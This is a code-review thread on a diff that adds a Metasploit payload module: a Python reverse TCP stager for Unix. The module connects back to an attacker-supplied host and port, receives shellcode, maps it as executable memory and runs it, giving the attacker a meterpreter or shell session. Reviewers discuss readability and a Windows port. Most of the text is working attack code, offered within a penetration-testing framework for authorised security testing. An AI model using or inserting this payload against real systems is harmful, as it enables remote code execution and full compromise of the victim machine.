modules/payloads/singles/cmd/unix/reverse_meterpreter_python.rb

```diff
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP stager (via Python)',
+      'Version'     => '$Revision: 0.3$',
+      'Description' => 'if connects back and runs the second stager of meterpreter (or shell) via Python, replicating the behavior of the reverse_tcp stager, it needs the ip/port of the multi handler which would be giving the proper payload',
+      'Author'      => 'pasta <jaguinaga@faradaysec.com>',
+      'License'     => GPL_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'python3',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+    register_options([
+      OptString.new('SHELL', [true, 'The kind of payload to run, could be meterpreter or shell', 'meterpreter'])
+    ])
+  end
+
+  def generate
+    if datastore['SHELL'].downcase.strip == 'meterpreter'
+        payload_size = 0x7e
+    elsif datastore['SHELL'].downcase.strip == 'shell'
+        payload_size = 0x26
+    else
+        payload_size = 0x500
+    end
+
+    return super + command_string
+  end
+
+  #
+  # Generate random whitespace
+  #
+
+  def random_padding
+    " "*rand(10)
+  end
+
+  #
+  # Generate command string
+  #
+
+  def command_string
+    raw_cmd = "import socket,struct,ctypes,ctypes.util;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']}));sc=b\"\\xbf\"+struct.pack(\"<L\",s.fileno())+s.recv(126);l=ctypes.CDLL(ctypes.util.find_library(\"c\"));l.mmap.restype=ctypes.c_void_p;l.mprotect.argtypes=[ctypes.c_void_p,ctypes.c_int,ctypes.c_int];m=l.mmap(0,len(sc),3,0x22,-1,0);ctypes.memmove(m,sc,len(sc));l.mprotect(m,len(sc),5);ctypes.CFUNCTYPE(ctypes.c_int)(m)()"
```

Comment:
You should consider including the payload unobfuscated (with line breaks, etc) so that's it's readable and easy to modify, then replace them with ';' when it's generated.

Reply:
I like it, thanks for the work

what do you think about where the plugin could fit better?

@timwr Do I need to do something to merge your modification?

P.D.: this command also works with the linux/x64/shell/reverse_tcp and I have been working in a Windows' version in order to run the vncinject in the same way

Reply:
Apologies I didn't send a PR because I wasn't sure if it was correct. I added one now: https://github.com/pastaoficial/metasploit-framework/pull/1 but I'm still not sure if it's the correct way to do it. For instance I was expecting adding 'win' to the platform list would add a `windows/x64/meterpreter/python_reverse_tcp` payload, but it doesn't work (unlike osx). I also didn't test the x86 and shell payloads.